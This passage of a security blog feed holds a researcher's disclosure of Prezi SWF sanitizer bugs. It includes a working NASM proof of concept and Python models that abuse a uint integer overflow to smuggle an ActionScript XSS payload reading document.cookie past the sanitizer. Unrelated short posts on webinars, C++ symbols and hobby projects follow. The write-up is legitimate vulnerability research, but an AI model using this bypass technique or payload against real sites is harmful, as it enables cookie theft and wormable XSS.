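tags = [(2, b"shape"), (12, b"action"), (95, b"unknown future tag"), (0, b"")]
print(keep_allowed_tags(tags))
```

With this approach a tag ID introduced by a future version of the format is dropped by default instead of slipping through.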

Bug 2: Integer overflow in AS into XSS

Digging deeper into the chunk removing code I noticed the following code:

private static function skipTag(param1:ByteArray) : void
{
  var _loc_2:* = getTagLengthAndSkipHeader(param1);
  param1.position = param1.position + _loc_2;
}// end function

The getTagLengthAndSkipHeader call retrieves an attacker-controlled chunk length from the SWF file - as noted in the previous bug, for long chunks this can be a 32-bit value, and the returned type is uint.

The line after it (param1.position = param1.position + _loc_2) does an addition assignment to skip past the chunk-that-is-OK in the data stream. The param1.position is also uint according to the AS documentation.

You know where this is going :)

In ActionScript uint is a 32-bit unsigned value with modulo arithmetic, so the result of the above addition is also truncated to 32-bit, regardless of its true value. So yes, it's an integer overflow. And it allowed one to bypass the SWF sanitizer.
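A tiny Python model of that addition may help. Python integers don't wrap on their own, so the 32-bit truncation is applied by hand; the function name `skip_tag` and the sample values are hypothetical.

```python
UINT32_MASK = 0xFFFFFFFF


def skip_tag(position, tag_length):
    """Model `position = position + length` with 32-bit unsigned wrap-around."""
    return (position + tag_length) & UINT32_MASK


# Hypothetical values: the sanitizer sits at offset 100 and the attacker
# declares a tag length of 0xFFFFFFF0, which acts like -16 after the wrap.
new_position = skip_tag(100, 0xFFFFFFF0)
```

Here `new_position` ends up 16 bytes before the starting offset, i.e. the sanitizer moves backwards in the stream.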

Exploiting this turned out to be quite interesting and included a small twist which made things even more entertaining.

Starting with the basic idea, here is how the sanitizer worked from a high level perspective (in pseudocode; I'll omit code added after patching the previous bug, since it changes nothing):

SWF = decompress(SWF)
SWF.position ← 0
SWF.headers.fileLength ← SWF.length
skip SWF headers
while SWF.bytesAvailable > 0 {
  if Tag at SWF.position is in blacklist {
    eraseTag(SWF)
  } else {
    skipTag(SWF)
  }
}

The skipTag was already shown above, so that leaves just the eraseTag method:

old_position ← SWF.position
skipTag(SWF)
temp_buffer ← new ByteArray()
SWF.readBytes(temp_buffer)
SWF.position ← old_position
SWF.writeBytes(temp_buffer)
SWF.length ← old_position + temp_buffer.length
SWF.position ← old_position

So eraseTag basically copies whatever is past the tag-to-be-removed on top of that tag and fixes the total data size (SWF.length) afterwards.

The above allows us to basically jump backwards into the middle of a chunk (that's the consequence of the integer overflow) and remove however many bytes we like. This of course leads to changing how the Adobe Flash SWF interpreter will see the file, which is different than how the sanitizer originally saw it.
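The whole mechanism can be simulated in a few lines of Python. This is a simplified model and not the original ActionScript: the SWF file headers are left out, only the "code" and "imports" blacklists are applied (the third check was never called), and all function names and the crafted layout are assumptions of mine. The layout is a smaller variant of the trick: a fake blacklisted header hidden in the first tag's data, an overflowing tag that jumps back onto it, and a "send to EOF" tag right behind.

```python
import struct

UINT32_MASK = 0xFFFFFFFF
BLACKLIST = {12, 59, 76, 82, 57, 71}  # IDs from isTagTypeCode / isTagTypeImports


def read_header(buf, pos):
    """Return (tag_id, length, position_after_header) for the tag at pos."""
    (word,) = struct.unpack_from("<H", buf, pos)
    tag_id, length = word >> 6, word & 0x3F
    pos += 2
    if length == 0x3F:  # long form: a 32-bit length follows the 16-bit word
        (length,) = struct.unpack_from("<I", buf, pos)
        pos += 4
    return tag_id, length, pos


def skip_tag(buf, pos):
    _, length, pos = read_header(buf, pos)
    return (pos + length) & UINT32_MASK  # wraps around like uint


def erase_tag(buf, pos):
    end = skip_tag(buf, pos)
    buf[pos:] = buf[end:]  # copy the tail over the tag and shrink the buffer
    return pos


def sanitize(data, pos=0):
    buf = bytearray(data)
    while pos < len(buf):
        tag_id, _, _ = read_header(buf, pos)
        pos = erase_tag(buf, pos) if tag_id in BLACKLIST else skip_tag(buf, pos)
    return bytes(buf)


def tag_ids(buf):
    """List tag IDs the way a well-behaved parser walking the file sees them."""
    ids, pos = [], 0
    while pos < len(buf):
        tag_id, length, pos = read_header(buf, pos)
        ids.append(tag_id)
        pos += length
    return ids


def short_tag(tag_id, data=b""):
    return struct.pack("<H", (tag_id << 6) | len(data)) + data


def long_header(tag_id, length):
    return struct.pack("<HI", (tag_id << 6) | 0x3F, length & UINT32_MASK)


# Sanity check: a plain DoAction (12) between ShowFrame (1) and End (0) is removed.
benign = sanitize(short_tag(1) + short_tag(12, b"abc") + short_tag(0))

# Crafted input (hypothetical layout).
fake_header = struct.pack("<H", (12 << 6) | 12)   # "DoAction, 12 bytes of data"
first = short_tag(1, fake_header + b"\xaa" * 6)   # fake header hides in tag data
overflow = long_header(1, 2 - (len(first) + 6))   # wraps back to offset 2
to_eof = long_header(1, 0x7FFFFFFF)               # sends the sanitizer past EOF
hidden = short_tag(12, b"evil") + short_tag(0)    # never inspected
crafted = first + overflow + to_eof + b"\xaa" * 2 + hidden
output = sanitize(crafted)
```

In this model `tag_ids(output)` still lists a DoAction tag: the sanitizer erased the fake header together with the overflowing tag and then ran off to EOF, while a parser reading the output swallows the "send to EOF" header as data of the first tag and lands on the hidden chunk.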

Let's look at an example:

So basically this is what's happening here (in chronological order):
  • The sanitizer reaches the overflowing tag and jumps backward into the first shown tag's data.
  • The data contains a valid chunk header, which describes a tag which is on the blacklist. This chunk gets removed.
  • The next tag (which originally was just second chunk's data) has a huge length which sends the sanitizer to EOF and so the sanitizer exits.
  • When the Adobe Flash SWF parser sees the output, it sees the "send to EOF" chunk, the overflowing chunk and the padding just as the first tag's data, and ignores it (ShowFrame has no meaningful data from the SWF parser's perspective).
  • And it reaches the hidden "evil" tags which contain ActionScript to execute. The sanitizer never had a chance to see and sanitize these tags, since it was sent backwards and then to EOF.
Now, here's the catch: Prezi's sanitizing code has a bug which triggers a quirky behavior in Adobe Flash, which prevents execution of any ActionScript.

Remember these lines?

SWF = decompress(SWF)
SWF.headers.fileLength ← SWF.length

This fixes the SWF length after decompression. However, the file length in the SWF headers should also be fixed if any chunk gets removed and it's not. For some reason an incorrect size causes Flash to ignore any ActionScript (I never got to the bottom of why exactly this is happening, though; it acted very peculiarly).

So, to exploit this I needed to make the sanitizer fix the headers for me. This turned out to be both simple and a little more tricky. Simple, because the overflow allowed me to send the sanitizer back as far as I wanted - e.g. to the beginning of the SWF headers. And more tricky, because the DWORD representing the file size is just after the SWF magic and version, so that means I had to make the file size be at the same time a valid chunk header for a blacklisted chunk (but that turned out to not be a problem).

The final setup looked like this (in the data of the hidden chunks the sanitizer was sent to EOF of course):

The NASM code (it's the way I prefer to generate simple binary files - don't worry, it's "Ange Approved" ;>) to generate a PoC according to the above schema looks like this:

[bits 32]
org 0

; SWF file
start:

; ----------------------- HEADERS
db "FWS"
db 6 ; version 6

size_of_data_header:
dd end_of_file ; size of data

db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1 ; 1 Frame

; ----------------------- TAGS
%macro TAG_SHORT 2
dw (%2 | %1 <<6)
%endmacro

%macro TAG_LONG 2
%2:
dw (0x3f | %1 << 6)
dd .end - ($ + 4)
%endmacro

%macro TAG_LONG_MANUAL 2
dw (0x3f | %1 << 6)
dd %2
%endmacro

%define TAG_End 0
%define TAG_ShowFrame 1
%define TAG_DefineShape 2
%define TAG_SetBackgroundColor 9
%define TAG_PlaceObject2 26
%define TAG_DoAction 12

; Start of tags.

; Trigger the integer overflow to go back to the size of data field
TAG_LONG_MANUAL TAG_ShowFrame, -(($ - size_of_data_header) + 4)
times 41 db 0xaa

; Data continues here.
; Or actually it's the headers we need to rebuild.

dd 766 ; New file size. It's equal to tag 11, size 62
db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1 ; 1 Frame

; There are 47 bytes left here before that crazy thing returns.
; times 47 db 0xaa
TAG_LONG TAG_DoAction, MyAction1
db 0x83
dw .StringsEnd1 - ($ + 2) ; Size
db "javascript:prompt(document.domain,"
; Fun fact - in 4 bytes the crazy thing returns.
db '"   '
; It's here. Well, send it back to the void or something.
db 0x3f ; Long tag size. (it's actually '?')
db ':' ; Tag ID. Whatever.
db '    ' ; 0x20202020 - this should be enough to get rid of it for good.
db '" + ' ; And we're done here.
; Let's continue where we left off, shall we?
db "document.cookie);", 0
db "", 0 ; _blank
.StringsEnd1:
.ActionsEnd: db 0 ; EndOfAction Flag
.end:

TAG_SHORT TAG_ShowFrame, 0

; End.
; 12 << 6 == 768
; + 0x3e == 830
times (((12 << 6) | 0x3e) - ($-start)) db 0xcc
end_of_file:

Of course ideally you wouldn't redirect the sanitizer into the middle of your AS/JS payload, but it's just a PoC, so no sense thinking too much about it I guess; especially that it worked:

Again, I would classify this as a stored/wormable XSS.
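As a cross-check of the two magic numbers in the PoC (830 and 766), the snippet below decodes the low 16 bits of each file size the way a tag header is decoded: upper 10 bits are the tag ID, lower 6 bits the short length. The helper name `decode_record_header` is made up for this sketch.

```python
def decode_record_header(word):
    """Split a 16-bit SWF tag header into (tag_id, short_length)."""
    word &= 0xFFFF
    return word >> 6, word & 0x3F


# Original file size field: reads as DoAction (12) with 62 bytes of data,
# so the sanitizer erases 2 + 62 = 64 bytes starting at the size field.
before = decode_record_header(830)

# Rebuilt file size field: reads as tag 11 with 62 bytes of data,
# which is not on the blacklist and is simply skipped.
after = decode_record_header(766)

removed = 2 + before[1]
```

So the rebuilt size is exactly the old size minus the erased bytes, and it still happens to parse as a harmless tag header.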

Bug 3 (unexploitable): Abusing the AES-128-CBC IV

Let's document some failures as well :)

This bug did exist (so it wasn't a false-positive), but it turned out to be non-exploitable due to how bloated the SWF headers are. Still, it's a pretty fun example of what you can attempt to do with crypto in certain, very specific, scenarios.

Let's start by discussing how Prezi is (was) loaded (I'll simplify it a little to focus on the important part):
  1. The website actually embeds a loader (called preziloader-*.swf).
  2. The loader fetches a 128-bit AES key and a 128-bit AES IV from /api/embed (yes, it's a relative path).
  3. The loader loads into a ByteArray the main module: main-*.swf from * (the domain is verified).
  4. The first 2064 bytes of the main SWF file are decrypted using AES-128-CBC, using the retrieved keys. The rest of the bytes are already plain-text.
  5. The main SWF is loaded into the same security context.
This means that:
  • We don't control main-*.swf at all.
  • But we do control both AES key and IV.
And, whoever controls the AES-128-CBC IV, fully controls the first 16 bytes of the decrypted main-*.swf.

This is because AES in CBC mode works like this:
  1. Take the next 16-byte block.
  2. Decrypt the block using AES KEY and AES algorithm.
  3. XOR the result with the 16-byte IV (for the first block) or with the previous ciphertext block (for every later block) and that's the decrypted block.
  4. GOTO 1 until end of data.
So basically:
  1. We know the result of the decryption of the first block (we can just grab main-*.swf and decrypt it using either their AES key or a different key that will give "wrong" data, that doesn't really matter).
  2. And we can choose what to XOR it with (IV).
So, basically, we choose the result of the decryption of the first block* (and get trashed data in all the other blocks).
* - actually, if we think of the data as 16-byte rows, then we control one byte in each column, in a row of our choice; all bytes don't have to be in the same row.
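The XOR step for the first block can be sketched in Python without any crypto library. The AES decryption itself is deliberately left out: `intermediate` stands in for the raw AES decryption of the first ciphertext block under whatever key is used, and its value here is made up, as are the function names and the desired bytes.

```python
def xor_bytes(a, b):
    """XOR two equally long byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


def forge_iv(intermediate, desired):
    """Pick the IV so that intermediate XOR IV equals the desired first block."""
    if len(intermediate) != 16 or len(desired) != 16:
        raise ValueError("AES blocks are 16 bytes")
    return xor_bytes(intermediate, desired)


# Stand-in for the AES-decrypted first block (assumption: in practice this
# comes from running the real decryption on main-*.swf with the chosen key).
intermediate = bytes(range(0x10, 0x20))

# The 16 bytes we would like the loader to see after CBC decryption.
desired = b"FWS\x06" + b"\x00" * 12

iv = forge_iv(intermediate, desired)
first_block = xor_bytes(intermediate, iv)  # what CBC produces with our IV
```

Since XOR is its own inverse, `first_block` equals `desired` for any `intermediate`, which is why the key doesn't matter for these 16 bytes.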

There are a couple of important things to note:
  • The IV gives us only 16 bytes to control.
  • With some AES key brute forcing it might be possible to control an additional 2-5 bytes - however the time to get the additional bytes grows exponentially - it's 256**N operations (AES decryptions) basically, where N is the number of additional bytes we would like to control. This is also tricky for another reason (it will create additional constraints for byte values due to the IV changes we will have to make).
  • Prezi actually uses AES-128-CBC with PKCS#5, so padding bytes have to have the value of padding length (e.g. 5-byte padding has to look like this: 05 05 05 05 05). And remember: if we choose a different key/IV, the original padding will be destroyed. This can be bypassed by choosing such an IV that the last byte in the last block is 0x00 or 0x01 (then the padding is not checked because it's assumed that there is no padding at all, or it's a one-byte padding only). So this is not a huge problem.
  • If we choose the ZWS format for the SWF file, Prezi loader is nice enough to fix the magic and file size in the SWF header, so that's 7 bytes we wouldn't have to worry about. But there is an additional LZMA header which we would have to start worrying about, so it gives us nothing.
  • Probably some of the bytes in the SWF header can have a broken value and the SWF will still work. So we don't have to worry about these bytes.
To sum up: we would control about 18-21 bytes, wouldn't have to worry about a few more and everything else would be "random bytes" (the result of decrypting data with wrong key and IV).
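The padding remark can be illustrated with a small Python model of a lenient padding check. It follows the behaviour described above (a final 0x00 means "no padding", a final 0x01 is trivially valid) and is an assumption about how such a check might look, not the code Prezi actually used.

```python
def strip_padding(data):
    """Remove PKCS#5-style padding, treating a final 0x00 as 'no padding'."""
    n = data[-1]
    if n == 0:
        return data  # assumed lenient behaviour: nothing to check or strip
    if n > 16 or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


proper = strip_padding(b"abc" + b"\x05" * 5)  # regular 5-byte padding
one_byte = strip_padding(b"junk\x01")         # last byte 0x01 always passes
no_pad = strip_padding(b"junk\x00")           # last byte 0x00 skips the check

try:
    strip_padding(b"junk\x07\x05")            # garbage ending in 0x05 fails
    rejected = False
except ValueError:
    rejected = True
```

With garbage plaintext, only the last byte has to be forced to 0x00 or 0x01 to get through such a check; any larger value would need several bytes to line up.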

Sadly/thankfully (depending on the perspective) in the end this is not exploitable with SWFs, because one would need to control about 50 bytes of SWF to make a valid file that has some meaningful code which gives you code execution. So... close, but no cigar :)

Tools used

In no particular order:
  • Sothink SWF Decompiler - Pretty fast and accurate tool. Had minor problems with a function or two, but that's still really good. You can re-compile the code it generates without any changes at all (very useful for testing).
  • JPEXS Free Flash Decompiler (aka FFDec) - A free and open-source SWF decompiler. Takes its time when decompiling, but sometimes does a better job than Sothink. It can also extract SWF files from a process' (think: browser's) memory - this proved useful. I didn't try to re-compile the code it generates.
  • Netwide Assembler (aka NASM) - An x86 assembler which I commonly misuse to assemble non-complex binary files.
  • Adobe Flex - Your basic ActionScript compiler.
  • Python - For additional scripts and mini-tools.
  • Firefox + Fiddler - HTTP communication monitoring.

And that's about it. Let me know if you have any questions or if I got something wrong.

Video recording of my Data, data, data! reverse-engineering webinar

By Gynvael Coldwind | Wed, 19 Mar 2014 00:08:51 +0100 | @domain:
As you probably know, we ran into some serious technical problems during the webinar (who would suspect a hangouts outage, huh), which caused a 40-minute delay, a change of platform and some minor problems on the line (like the lack of a recording). So, as promised, I did record the talk again and I've just posted it on YouTube, to be enjoyed by everyone who couldn't see the live one, or decided to wait for the video for other reasons (the technical problems being a good one).

Context: please refer to this post.

"Data, data, data! I can't make bricks without clay." A few practical notes on reverse-engineering.

Direct YouTube link: click

The talk was done as part of Garage4Hackers Ranchoddas Series.

Slides: here
Scripts, etc: here

Once again sorry for the technical issues during the live talk.
Let me know what you think about the talk (questions are welcome as well) :)


C++ symbols in debian/symbols files - symbol export maps

By sil2100 | Mon, 17 Mar 2014 20:04:00 GMT | @domain:
When developing a C++ library that we later intend to provide by means of a Debian package, there are certain things that make it really complicated and hard to maintain. Anyone who has had to deal with debian/symbols in a C++ library knows how troublesome it is. The biggest problem besides name mangling: symbol leakage. By default the GNU ELF linker exports everything as it goes, leading to maintenance hell. Sadly, this has to be dealt with on the source level - the best way? Symbol export maps.

A free webinar on Reverse Engineering

By Gynvael Coldwind | Tue, 11 Mar 2014 00:08:48 +0100 | @domain:
Next week I will be doing a free webinar on Reverse Engineering - "Data, data, data! I can't make bricks without clay."*. I will focus on practical RE tips and tricks I'm using day-to-day, which generally speed up the whole process or are simply cool (imo). The webinar will be hosted by Garage4Hackers as part of the Ranchoddas Series; see the details below.

Title: "Data, data, data! I can't make bricks without clay."* A few practical notes on reverse-engineering.
* Sir Arthur Conan Doyle, The Adventure of the Copper Beeches (one of the Sherlock Holmes short stories)

Date: 17 March 2014
Time (Switzerland/EU aka UTC+01:00 aka CET aka GMT +1:00): 18:00
Time (IST aka GMT +5:30): 22:30
Time (other places):
Duration: TBD, but something between 45-60 minutes + time for questions

Video stream: or
Questions / chat: #g4h @ (or via web:

Registration link: click
(We will be sending out the video link via e-mail, once we have it - probably just before the webinar; we'll also post that link on G4H forum/facebook/twitter + probably around here.)

The presentation will be focused on various practical tips and tricks that can speed up the process of reverse-engineering. The presented information will not be strictly tied to any specific platform or tool - most of it can be applied on any architecture or operating system.

Examples of topics:
- how to start with an unknown architecture
- debugger scripting
- creating your own useful tools
- etc

Prerequisites:
- some reverse-engineering experience or general interest in reverse-engineering
- basic programming skills
- basic knowledge of how the CPU and operating systems work


Big thanks to Garage4Hackers Team for organizing this!

Let me know if you are planning to attend and see you there :)

My first ever podcast in English - solving Binathlon 400 CTF crackme

By Gynvael Coldwind | Mon, 17 Feb 2014 00:08:47 +0100 | @domain:
As some of you may know, I've published a little over a hundred podcasts in my native language and it seems I finally got around to trying to record something in English. The podcast is about one of the solutions (and a lazy one at that) to the "HackMe" Binathlon 400 task (it was basically a ZX Spectrum crackme) from the Olympic CTF Sochi 2014 run by the MSLC.

I hope you'll enjoy the video. Feel free to ask any questions (ideally in the YouTube comments) with regards to the task that you have.

If you like the idea of me recording podcasts on security, reverse-engineering and programming related topics, let me know - I might make a habit out of it.

Node.js gamepad driver

By xa | Sat, 01 Feb 2014 22:25:00 GMT | @domain:

Node.js gamepad in action

Some time ago I wanted to play an old-school game and I wanted to use my gamepad, and of course I could not find it. The solution? Create my own gamepad, but with limited hardware related skills that would be a little bit difficult. The next best thing - to use a touch-capable device. But it turned out quite quickly that it would not be so easy. It’s not a problem when the HTML5 gamepad controls an HTML5 game on the same server/browser, but what about native games? A driver would be needed for that and my level of expertise in that area was the same as my level in hardware building mumbo-jumbo. My experimental “driver” had two main goals: to run on Ubuntu and to be built in Node.js.

The following post is not a tutorial, so I’m not covering the subject from top to bottom, but I’m providing a great starting point. This should give you some idea how things work and what to expect from such a device. At the end I’m linking to a Node.js application which acts like a device driver. This app is not in any way a production ready solution, but only an experiment, so keep in mind that there are many bugs, and that there is a high possibility that it will not run on your system (I’ve created it and tested only on Ubuntu 13.10).

Fun with antigravity

By xa | Tue, 28 Jan 2014 22:00:00 GMT | @domain:

Some time ago, I needed a simple crowd algorithm for a project of mine. In that project there was a bunch of entities, which were moving towards a common target. Everything was alright until those entities were close to the target and each other - every entity was placed at the target at the same point. I've tried to implement some collision detection for every entity, so if one entity detected that it is colliding with another one, it would stop moving and wait for the second entity to go away. But, when there would be multiple entities in close proximity - then almost everyone would wait for everyone.

The solution for a simple, almost dumb crowd simulation was very close. Every entity, instead of stopping and waiting, should apply a reverse force which would depend on the proximity to a nearby entity. That approach is the opposite of gravity - antigravity.

The result of this algorithm can be seen above, with some presets for particle behaviors, from "crowd" and "jelly" to "bacteria". Such a simple solution can create a great range of possibilities. Of course this is not near a full blown crowd simulation with advanced agent AI, but for my small project, the antigravity did a great job.
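For readers who want to try the idea, here is a rough Python sketch of one simulation step. It is not the code behind the demo: the function name `antigravity_step`, the linear falloff of the push and all default parameters are assumptions picked for illustration.

```python
import math


def antigravity_step(positions, target, attract=1.0, repel=4.0, radius=3.0):
    """Move every entity one step: pull towards target, push away from neighbours."""
    moved = []
    for i, (x, y) in enumerate(positions):
        # Constant-strength pull towards the common target.
        dx, dy = target[0] - x, target[1] - y
        dist = math.hypot(dx, dy)
        fx = attract * dx / dist if dist else 0.0
        fy = attract * dy / dist if dist else 0.0
        # Reverse force from every entity closer than `radius`.
        for j, (ox, oy) in enumerate(positions):
            if i == j:
                continue
            rx, ry = x - ox, y - oy
            d = math.hypot(rx, ry)
            if 0 < d < radius:
                push = repel * (radius - d) / radius  # stronger when closer
                fx += push * rx / d
                fy += push * ry / d
        moved.append((x + fx, y + fy))
    return moved


# A lone entity just walks towards the target...
alone = antigravity_step([(0.0, 0.0)], (10.0, 0.0))

# ...while two close entities are pushed apart (pull disabled to isolate it).
pair = antigravity_step([(0.0, 0.0), (1.0, 0.0)], (0.5, 5.0), attract=0.0)
```

Tuning `repel` and `radius` against `attract` is presumably what separates presets like "crowd" from "jelly", though that mapping is a guess on my side.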